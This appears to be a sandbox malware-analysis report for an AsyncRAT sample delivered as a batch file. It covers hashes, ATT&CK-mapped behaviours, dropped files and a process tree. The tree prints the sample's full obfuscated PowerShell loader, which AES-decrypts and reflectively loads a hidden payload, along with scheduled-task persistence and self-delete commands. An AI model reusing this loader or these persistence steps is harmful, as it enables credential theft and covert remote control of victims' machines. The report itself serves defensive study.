asyncrat | a15f29572a149a04d45b8c01daa047ec9f517077a507f8d53ac9b8a8ceed4a34

Analysis

max time kernel
126s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20221111-en
resource tags

arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
submitted
31-01-2023 17:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

payload.bat
Size

48KB
MD5

83875df1ddf8a47531e763f5bc140691
SHA1

8d1bc0c5bceedd229b8faaf6542779726188b145
SHA256

a15f29572a149a04d45b8c01daa047ec9f517077a507f8d53ac9b8a8ceed4a34
SHA512

e19c020f4fe1922a4adef3dd50851514a99852b7eefa9b74e6e954f941349a60589e171a618423d0029e8d3e8568536026a1012586a74daa4d19a1ebabb701a7
SSDEEP

768:xZZOUUP++sgCpDgSE2WPENq+qrD/PESqitk3Spn1eqy1nUNamt:m+qCNgNgqdj1qitvl

Score

10^/10

asyncrat rat spyware stealer

Malware Config

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat
Executes dropped EXE 3 IoCs

Processes:

payload.bat.exeexfmrn.bat.exebwsjzq.bat.exe

pid process

2036 payload.bat.exe
3672 exfmrn.bat.exe
956 bwsjzq.bat.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

payload.bat.exebwsjzq.bat.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation	payload.bat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation	bwsjzq.bat.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

41 api.ipify.org
42 api.ipify.org
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

4104 schtasks.exe
4684 schtasks.exe

flow	ioc
41	api.ipify.org
42	api.ipify.org

pid	process
4104	schtasks.exe
4684	schtasks.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

payload.bat.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	payload.bat.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	payload.bat.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

Processes:

payload.bat.exepowershell.exeexfmrn.bat.exepowershell.exebwsjzq.bat.exe

pid	process
2036	payload.bat.exe
2036	payload.bat.exe
3784	powershell.exe
3784	powershell.exe
3672	exfmrn.bat.exe
3672	exfmrn.bat.exe
2400	powershell.exe
2400	powershell.exe
956	bwsjzq.bat.exe
956	bwsjzq.bat.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

payload.bat.exepowershell.exeexfmrn.bat.exepowershell.exebwsjzq.bat.exe

description	pid	process
Token: SeDebugPrivilege	2036	payload.bat.exe
Token: SeDebugPrivilege	3784	powershell.exe
Token: SeDebugPrivilege	3672	exfmrn.bat.exe
Token: SeDebugPrivilege	2400	powershell.exe
Token: SeDebugPrivilege	956	bwsjzq.bat.exe

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

exfmrn.bat.exebwsjzq.bat.exe

pid process

3672 exfmrn.bat.exe
3672 exfmrn.bat.exe
956 bwsjzq.bat.exe
Suspicious use of SendNotifyMessage 3 IoCs

Processes:

exfmrn.bat.exebwsjzq.bat.exe

pid process

3672 exfmrn.bat.exe
3672 exfmrn.bat.exe
956 bwsjzq.bat.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

exfmrn.bat.exe

pid process

3672 exfmrn.bat.exe

pid	process
3672	exfmrn.bat.exe
3672	exfmrn.bat.exe
956	bwsjzq.bat.exe

pid	process
3672	exfmrn.bat.exe
3672	exfmrn.bat.exe
956	bwsjzq.bat.exe

pid	process
3672	exfmrn.bat.exe

Suspicious use of WriteProcessMemory 28 IoCs

Processes:

cmd.exepayload.bat.execmd.exepowershell.execmd.exeexfmrn.bat.execmd.exepowershell.execmd.exebwsjzq.bat.execmd.exe

description	pid	process	target process
PID 4424 wrote to memory of 2036	4424	cmd.exe	payload.bat.exe
PID 4424 wrote to memory of 2036	4424	cmd.exe	payload.bat.exe
PID 2036 wrote to memory of 3248	2036	payload.bat.exe	cmd.exe
PID 2036 wrote to memory of 3248	2036	payload.bat.exe	cmd.exe
PID 3248 wrote to memory of 3784	3248	cmd.exe	powershell.exe
PID 3248 wrote to memory of 3784	3248	cmd.exe	powershell.exe
PID 3784 wrote to memory of 364	3784	powershell.exe	cmd.exe
PID 3784 wrote to memory of 364	3784	powershell.exe	cmd.exe
PID 364 wrote to memory of 3672	364	cmd.exe	exfmrn.bat.exe
PID 364 wrote to memory of 3672	364	cmd.exe	exfmrn.bat.exe
PID 3672 wrote to memory of 4104	3672	exfmrn.bat.exe	schtasks.exe
PID 3672 wrote to memory of 4104	3672	exfmrn.bat.exe	schtasks.exe
PID 2036 wrote to memory of 1452	2036	payload.bat.exe	cmd.exe
PID 2036 wrote to memory of 1452	2036	payload.bat.exe	cmd.exe
PID 1452 wrote to memory of 2400	1452	cmd.exe	powershell.exe
PID 1452 wrote to memory of 2400	1452	cmd.exe	powershell.exe
PID 2400 wrote to memory of 2188	2400	powershell.exe	cmd.exe
PID 2400 wrote to memory of 2188	2400	powershell.exe	cmd.exe
PID 2188 wrote to memory of 956	2188	cmd.exe	bwsjzq.bat.exe
PID 2188 wrote to memory of 956	2188	cmd.exe	bwsjzq.bat.exe
PID 956 wrote to memory of 4684	956	bwsjzq.bat.exe	schtasks.exe
PID 956 wrote to memory of 4684	956	bwsjzq.bat.exe	schtasks.exe
PID 956 wrote to memory of 2184	956	bwsjzq.bat.exe	cmd.exe
PID 956 wrote to memory of 2184	956	bwsjzq.bat.exe	cmd.exe
PID 2184 wrote to memory of 2504	2184	cmd.exe	choice.exe
PID 2184 wrote to memory of 2504	2184	cmd.exe	choice.exe
PID 2184 wrote to memory of 536	2184	cmd.exe	attrib.exe
PID 2184 wrote to memory of 536	2184	cmd.exe	attrib.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exe

pid process

536 attrib.exe

pid	process
536	attrib.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\payload.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4424
- C:\Users\Admin\AppData\Local\Temp\payload.bat.exe
  "payload.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $yruxp = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\payload.bat').Split([Environment]::NewLine);foreach ($AoHcJ in $yruxp) { if ($AoHcJ.StartsWith(':: ')) { $jSeTT = $AoHcJ.Substring(3); break; }; };$iPrdF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($jSeTT);$pstaK = New-Object System.Security.Cryptography.AesManaged;$pstaK.Mode = [System.Security.Cryptography.CipherMode]::CBC;$pstaK.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$pstaK.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oK9Sb6xmpGv+i/gAJDgfaubHDtLnuOUbT8h3z0NIMvs=');$pstaK.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CUeA3Qkm0ivKUIPg7zp+ug==');$FYwLw = $pstaK.CreateDecryptor();$iPrdF = $FYwLw.TransformFinalBlock($iPrdF, 0, $iPrdF.Length);$FYwLw.Dispose();$pstaK.Dispose();$XhabZ = New-Object System.IO.MemoryStream(, $iPrdF);$lkvIz = New-Object System.IO.MemoryStream;$oenGH = New-Object System.IO.Compression.GZipStream($XhabZ, [IO.Compression.CompressionMode]::Decompress);$oenGH.CopyTo($lkvIz);$oenGH.Dispose();$XhabZ.Dispose();$lkvIz.Dispose();$iPrdF = $lkvIz.ToArray();$QQBse = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($iPrdF);$qnZNg = $QQBse.EntryPoint;$qnZNg.Invoke($null, (, [string[]] ('')))
  2⤵
  - Executes dropped EXE
  - Checks computer location settings
  - Modifies system certificate store
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2036
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\exfmrn.bat"' & exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3248
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\exfmrn.bat"'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3784
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\exfmrn.bat" "
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:364
      - C:\Users\Admin\AppData\Local\Temp\exfmrn.bat.exe
        
        "exfmrn.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $wuFcA = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\exfmrn.bat').Split([Environment]::NewLine);foreach ($Qhmew in $wuFcA) { if ($Qhmew.StartsWith(':: ')) { $DRKdW = $Qhmew.Substring(3); break; }; };$QNjrj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($DRKdW);$zzZvT = New-Object System.Security.Cryptography.AesManaged;$zzZvT.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zzZvT.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zzZvT.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HfcWM+rJvuRz7fNfg7RvjCAYIGk5bOc03XAexE2rApk=');$zzZvT.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FJyGyCcHDQUdXm5OKNziPQ==');$OPuhB = $zzZvT.CreateDecryptor();$QNjrj = $OPuhB.TransformFinalBlock($QNjrj, 0, $QNjrj.Length);$OPuhB.Dispose();$zzZvT.Dispose();$XMSlK = New-Object System.IO.MemoryStream(, $QNjrj);$WPMvy = New-Object System.IO.MemoryStream;$CfkMZ = New-Object System.IO.Compression.GZipStream($XMSlK, [IO.Compression.CompressionMode]::Decompress);$CfkMZ.CopyTo($WPMvy);$CfkMZ.Dispose();$XMSlK.Dispose();$WPMvy.Dispose();$QNjrj = $WPMvy.ToArray();$ldIfF = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($QNjrj);$zZCkA = $ldIfF.EntryPoint;$zZCkA.Invoke($null, (, [string[]] ('')))
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:3672
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Window" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\exfmrn.bat.exe" /rl HIGHEST /f
        7⤵
        Creates scheduled task(s)
        
        PID:4104
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\bwsjzq.bat"' & exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1452
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\bwsjzq.bat"'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2400
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\bwsjzq.bat" "
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2188
      - C:\Users\Admin\AppData\Local\Temp\bwsjzq.bat.exe
        
        "bwsjzq.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $DlAMm = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\bwsjzq.bat').Split([Environment]::NewLine);foreach ($gnxLA in $DlAMm) { if ($gnxLA.StartsWith(':: ')) { $EieGe = $gnxLA.Substring(3); break; }; };$CtMSE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($EieGe);$CdbBY = New-Object System.Security.Cryptography.AesManaged;$CdbBY.Mode = [System.Security.Cryptography.CipherMode]::CBC;$CdbBY.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$CdbBY.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NEPcZ0sSGxev/0ytodeTKgGxdiSyFK6PvVJKMsPopm0=');$CdbBY.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x/ZAOJI37zOKAo+7A/xutg==');$bwBZg = $CdbBY.CreateDecryptor();$CtMSE = $bwBZg.TransformFinalBlock($CtMSE, 0, $CtMSE.Length);$bwBZg.Dispose();$CdbBY.Dispose();$OapWv = New-Object System.IO.MemoryStream(, $CtMSE);$Otndw = New-Object System.IO.MemoryStream;$HxJaj = New-Object System.IO.Compression.GZipStream($OapWv, [IO.Compression.CompressionMode]::Decompress);$HxJaj.CopyTo($Otndw);$HxJaj.Dispose();$OapWv.Dispose();$Otndw.Dispose();$CtMSE = $Otndw.ToArray();$HiNYF = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($CtMSE);$wpmOJ = $HiNYF.EntryPoint;$wpmOJ.Invoke($null, (, [string[]] ('')))
        6⤵
        Executes dropped EXE
        Checks computer location settings
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of WriteProcessMemory
        
        PID:956
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Window" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\bwsjzq.bat.exe" /rl HIGHEST /f
        7⤵
        Creates scheduled task(s)
        
        PID:4684
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c choice /c y /n /d y /t 1 & attrib -h -s "C:\Users\Admin\AppData\Local\Temp\bwsjzq.bat.exe" & del "C:\Users\Admin\AppData\Local\Temp\bwsjzq.bat.exe"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:2184
        
        C:\Windows\system32\choice.exe
        
        choice /c y /n /d y /t 1
        8⤵
        
        PID:2504
        
        C:\Windows\system32\attrib.exe
        
        attrib -h -s "C:\Users\Admin\AppData\Local\Temp\bwsjzq.bat.exe"
        8⤵
        Views/modifies file attributes
        
        PID:536

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Hidden Files and Directories

T1158

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Hidden Files and Directories

T1158

Install Root Certificate

T1130

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
6cf293cb4d80be23433eecf74ddb5503

SHA1
24fe4752df102c2ef492954d6b046cb5512ad408

SHA256
b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

SHA512
0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
8980dfa97427347198e96089e8c63b20

SHA1
4ed90efbdca0d0820097ba5cc7a74045a91b0093

SHA256
73c69d9d2b407efb21afc04bc5b50decd24586abf21958122196a9e1ed6137ee

SHA512
2e765d6e433a6c31d918a4526825beca17f4413cfcf57a9c009d4755d492efedf9f54e68e22a80f9cd5fe0b7b46043c894abf673637a4b0226cf811263e17f77

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Temp\bwsjzq.bat

Filesize
325KB

MD5
36438d908fc48e243fc04035eba3a6cd

SHA1
a552a88e74440a1137b3a3a14e4089a630dfb855

SHA256
80504bf8dd15434a9841595f3f9e405f8843dd53b292d8e30d9a15b53b51fa7a

SHA512
3cea5f310c94129fe89c1cebfada52b4d0ac1d4f4e7be4ea06872b90e969b2bec4e322a127f6c4b02a9223ad6a29b21f90c1d627f233f938ded51da3ff6fd611

Download Submit
C:\Users\Admin\AppData\Local\Temp\bwsjzq.bat.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Admin\AppData\Local\Temp\bwsjzq.bat.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Admin\AppData\Local\Temp\exfmrn.bat

Filesize
325KB

MD5
a367598c8214bcc1f99bed1e86226761

SHA1
2eee6c4abab63c184be7af8d2d4b12ed32564505

SHA256
02390917ae0f41276e75f2c51b7677023ff16834dd1cbe468e72888e2bc6ebf0

SHA512
61dbd59c946f2f7d9cc87f7a1a492d6b1c8dbe600eda4309efb74d47c1f28bcd311710205b1d34edb19056f3cae129fb4653dfe901a30aebf43fee674aac24a9

Download Submit
C:\Users\Admin\AppData\Local\Temp\exfmrn.bat.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Admin\AppData\Local\Temp\exfmrn.bat.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Admin\AppData\Local\Temp\payload.bat.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Admin\AppData\Local\Temp\payload.bat.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
memory/364-143-0x0000000000000000-mapping.dmp

Download
memory/536-170-0x0000000000000000-mapping.dmp

Download
memory/956-161-0x0000000000000000-mapping.dmp

Download
memory/956-169-0x00007FF9A9160000-0x00007FF9A9C21000-memory.dmp

Filesize
10.8MB

Download
memory/956-165-0x00007FF9A9160000-0x00007FF9A9C21000-memory.dmp

Filesize
10.8MB

Download
memory/1452-155-0x0000000000000000-mapping.dmp

Download
memory/2036-134-0x00000222A1D30000-0x00000222A1D52000-memory.dmp

Filesize
136KB

Download
memory/2036-137-0x00007FF9A9160000-0x00007FF9A9C21000-memory.dmp

Filesize
10.8MB

Download
memory/2036-132-0x0000000000000000-mapping.dmp

Download
memory/2036-136-0x00007FF9A9160000-0x00007FF9A9C21000-memory.dmp

Filesize
10.8MB

Download
memory/2036-139-0x00000222A1FD0000-0x00000222A1FEE000-memory.dmp

Filesize
120KB

Download
memory/2036-138-0x00000222A25C0000-0x00000222A2636000-memory.dmp

Filesize
472KB

Download
memory/2184-167-0x0000000000000000-mapping.dmp

Download
memory/2188-159-0x0000000000000000-mapping.dmp

Download
memory/2400-171-0x00007FF9A9160000-0x00007FF9A9C21000-memory.dmp

Filesize
10.8MB

Download
memory/2400-156-0x0000000000000000-mapping.dmp

Download
memory/2400-160-0x00007FF9A9160000-0x00007FF9A9C21000-memory.dmp

Filesize
10.8MB

Download
memory/2504-168-0x0000000000000000-mapping.dmp

Download
memory/3248-140-0x0000000000000000-mapping.dmp

Download
memory/3672-148-0x00007FF9A9160000-0x00007FF9A9C21000-memory.dmp

Filesize
10.8MB

Download
memory/3672-145-0x0000000000000000-mapping.dmp

Download
memory/3672-154-0x00007FF9A9160000-0x00007FF9A9C21000-memory.dmp

Filesize
10.8MB

Download
memory/3672-153-0x00000272F0D90000-0x00000272F0F52000-memory.dmp

Filesize
1.8MB

Download
memory/3672-152-0x00000272F0B00000-0x00000272F0BB2000-memory.dmp

Filesize
712KB

Download
memory/3672-151-0x00000272F0260000-0x00000272F02B0000-memory.dmp

Filesize
320KB

Download
memory/3784-141-0x0000000000000000-mapping.dmp

Download
memory/3784-144-0x00007FF9A9160000-0x00007FF9A9C21000-memory.dmp

Filesize
10.8MB

Download
memory/4104-150-0x0000000000000000-mapping.dmp

Download
memory/4684-166-0x0000000000000000-mapping.dmp

Download